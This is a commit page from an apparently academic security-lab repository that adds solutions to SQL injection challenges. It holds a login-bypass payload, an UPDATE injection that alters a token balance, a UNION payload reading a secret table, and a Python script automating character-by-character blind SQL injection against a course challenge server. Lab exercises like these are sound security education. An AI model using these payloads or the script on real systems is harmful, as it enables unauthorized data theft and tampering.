didas/ssof_labs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Lab5

Browse Source
This commit is contained in:
didas72
2025-12-11 21:33:56 +00:00
parent f378edec75
commit 6ff3273351
4 changed files with 79 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
pa/lab5/chall_I_will_take_care_of_this_site.txt Normal file
View File

@@ -0,0 +1,3 @@
SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = '<pass>'
admin' OR username = '

3
pa/lab5/chall_money_money_money.txt Normal file
View File

@@ -0,0 +1,3 @@
UPDATE user SET bio = ''' WHERE username = 'didas'
', tokens = '65666

70
pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py Normal file
View File

@@ -0,0 +1,70 @@
from requests import get
from urllib.parse import quote
import re
BASE = "http://ssof2526.challenges.cwte.me:25262"
PL_HEAD = "' AND id = 0 UNION "
PL_TAIL = "--"
def get_arts(payload: str) -> int:
final_payload = PL_HEAD + payload + PL_TAIL
resp = get(BASE+"/?search="+quote(final_payload))
content = resp.content.decode('utf-8')
result = re.search(r"Found ([0-9]+) article", content)
if result is None:
print("Payload malformed:")
print(payload)
print(content)
exit(1)
return int(result.group(1))
def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> list[str]:
lengths = []
strings = []
for length in range(max):
length += 1
payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND %s;"%(column, column, column, table, column, length, where)
arts = get_arts(payload)
if arts != 0:
lengths.append(length)
print("Length %d has %s"%(length, arts))
for length in lengths:
print("Searching for len", length, " ", end="", flush=True)
name = ""
for _ in range(length):
print(".", end="", flush=True)
for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_()[]+-*/;:,. !\"&|{}~^`=":
cur_name = name + (l if l != '_' else "\\_")
payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND '%s' = substr((%s), %d, 1) AND %s;"%(column, column, column, table, column, length, l, column, len(cur_name)-1, where)
if (get_arts(payload) != 0):
name = cur_name
break
if name == cur_name[:-1]:
name = name + '_'
strings.append(name)
print(" found", name)
return strings
#print(stringer("name", "sqlite_master"))
#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
print(stringer("secret", "super_s_sof_secrets", max=120))
# SELECT id, title, content FROM blog_post WHERE title LIKE '<input>
#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --

3
pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt Normal file
View File

@@ -0,0 +1,3 @@
SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%'
' UNION SELECT id, title, content FROM secret_blog_post ;--